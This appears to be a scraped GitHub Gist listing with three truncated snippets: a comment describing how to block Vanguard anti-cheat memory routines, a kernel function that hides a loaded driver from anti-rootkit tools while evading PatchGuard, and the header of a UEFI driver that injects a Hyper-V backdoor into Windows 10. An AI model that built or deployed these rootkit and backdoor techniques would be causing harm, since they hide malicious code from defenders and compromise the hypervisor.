@kuh4it
kuh4it / vgm_ctx_stripped.hpp
Last active January 26, 2024 22:05
my CPU's temperature is too high
//
// <function>
// VgmCtx::BlockSwapContextHooks()
// </function>
// <purpose>
// Prevent all vanguard TLB flushing and PML4 page remapping/copying routines in 9 lines
// by setting a thermal sensor interrupt, not registered within the IDT directly
// </purpose>
//
VOID BlockSwapContextHooks()
@typcn
typcn / drvhider.c
Last active January 4, 2024 15:06
Hide Driver from ARK tools ( win7 -- win10 x64, patchguard safe )
VOID DrvObjHide(_In_ PVOID Context) {
// Wait until the driver has fully loaded
NTSTATUS status = STATUS_SUCCESS;
INT64 interval = 1000 * -10000i64;
status = KeDelayExecutionThread(KernelMode,FALSE,(PLARGE_INTEGER)&interval);
PDRIVER_OBJECT driver_object = (PDRIVER_OBJECT)Context;
tMiProcessLoaderEntry fun = (tMiProcessLoaderEntry)FindMiProcessLoaderEntry();
// MiProcessLoaderEntry will remove your driver from PsLoadedModuleList and the PatchGuard monitoring context,
// so it won't trigger a BSOD
@Cr4sh
Cr4sh / DmaHvBackdoor.c
Last active January 23, 2024 22:31
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which is called by
winload!OslFwpKernelSetupPhase1(). After the DXE phase exits, winload.efi
transfers execution to the previously loaded Hyper-V kernel (hvix64.sys)